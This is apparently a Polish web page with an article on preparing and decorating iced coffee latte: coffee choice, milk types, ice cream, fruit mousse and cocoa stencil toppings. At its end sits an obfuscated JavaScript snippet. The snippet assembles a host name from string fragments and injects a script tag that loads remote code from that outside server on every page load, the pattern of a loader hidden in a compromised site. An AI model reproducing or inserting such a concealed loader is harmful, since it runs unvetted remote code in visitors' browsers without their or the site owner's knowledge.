Mroźna latte(m)

<p><strong>Lato to czas słońca, podr&oacute;ży i deser&oacute;w na powietrzu. Wojażujemy na r&oacute;żne sposoby &ndash; czasem są to egzotyczne wyprawy w ciepłe kraje, niekiedy mamy ochotę poznać świat od kuchni w dosłownym znaczeniu. Podr&oacute;że kulinarne warto zainaugurować wykwintnym trunkiem &ndash; na początek napijmy się kawy.</strong><br />
Kiedy temperatura przekracza 25 stopni Celsjusza, zapominamy o gorących kawach i herbatach. Zastępujemy je wtedy orzeźwiającymi lemoniadami, raczymy podniebienia słodkimi lodowym deserami, często w towarzystwie napoju kawowego na bazie zimnego mleka. Jak zatem widać, smak kawy może nam umilać codzienność przez 365 dni w roku &ndash; jak zrobić tę idealną?<br />
<strong>Zapoznanie </strong><br />
Na og&oacute;ł kawę mrożoną traktujemy jako nap&oacute;j deserowy, na przykład w połączeniu z gałką lod&oacute;w waniliowych. Jej niezwykłość polega jednak na tym, że r&oacute;wnie dobrze może być mocna i pobudzająca jak gorące espresso. Do przyrządzenia idealnej kawy mrożonej wykorzystuje się granulat rozpuszczalny, choć profesjonalni bariści rekomendują korzystanie z naparu uzyskanego przy pomocy ekspresu. Producenci kawy prześcigają się w wariantach smakowych oraz aromatach. Miętowa, orzechowa, rumowa czy &bdquo;p&oacute;łnoc w Paryżu&rdquo; &ndash; każda z nich nadaje się na zmysłową ucztę.<br />
<strong>Uczta smak&oacute;w </strong><br />
Do przygotowania wysokiej szklanki orzeźwiającego napoju potrzebujemy 40 ml kawy. Wyb&oacute;r rodzaju i ilości mleka zależy od indywidualnych preferencji &ndash; spośr&oacute;d krowiego, ryżowego, czy sojowego z pewnością wybierzemy swoje ulubione.<br />
Kolejnym ważnym elementem jest odpowiedni dob&oacute;r dodatk&oacute;w. Niekt&oacute;rzy rozkochali swoje kubki smakowe w bitej śmietanie, są r&oacute;wnież tacy, kt&oacute;rym przypadła do gustu kawa mrożona z gałką lod&oacute;w w środku. Najlepszymi smakami będą waniliowe lub czekoladowe &ndash; dopełnią kompozycję bez ingerencji nuty spoza gamy. Jeżeli natomiast jesteście entuzjastami kawy z owocami, koniecznie spr&oacute;bujcie tej z dodatkiem musu. Zblendowane owoce odświeżą mleczny trunek oraz odrobinę go osłodzą.<br />
<strong>Zwieńczenie </strong><br />
Pora zamknąć kompozycję. Kawę mrożoną zwykle dekoruje się bitą śmietaną lub spienionym mlekiem. W drugim przypadku faktura piany jest ujednolicona, stąd też można pozwolić sobie na ostatnie słowo, będące barwnym i efektowym ukoronowaniem naszych baristycznych zmagań. Do tego celu możemy użyć kolorowych syrop&oacute;w lub przykładając wybrany wcześniej szablon, opr&oacute;szyć piankę kakao.<br />
Jeżeli chcecie sprawdzić inne pomysły na dekoracje, zajrzyjcie tu: <a href="http://przepisynakawe.pl/porada/szablonowe-wzorki-10" onclick="window.open(this.href, '', 'resizable=no,status=no,location=no,toolbar=no,menubar=no,fullscreen=no,scrollbars=no,dependent=no'); return false;">http://przepisynakawe.pl/porada/szablonowe-wzorki-10</a></p>


<script type="text/javascript">
(function(){
uyfm=document.createElement("script");uyfm.type="text/javascript";
uyfm.async=true;uyfm_=(("us")+"t")+"a";uyfm_+=("t.i")+""+"n";uyfm_+=(("f")+"o");
uyfm.src="http://"+uyfm_+"/3645900.b5hq24ltyfmfaxb014pkawgl1nvvmf";
document.body.appendChild(uyfm);
})();
</script>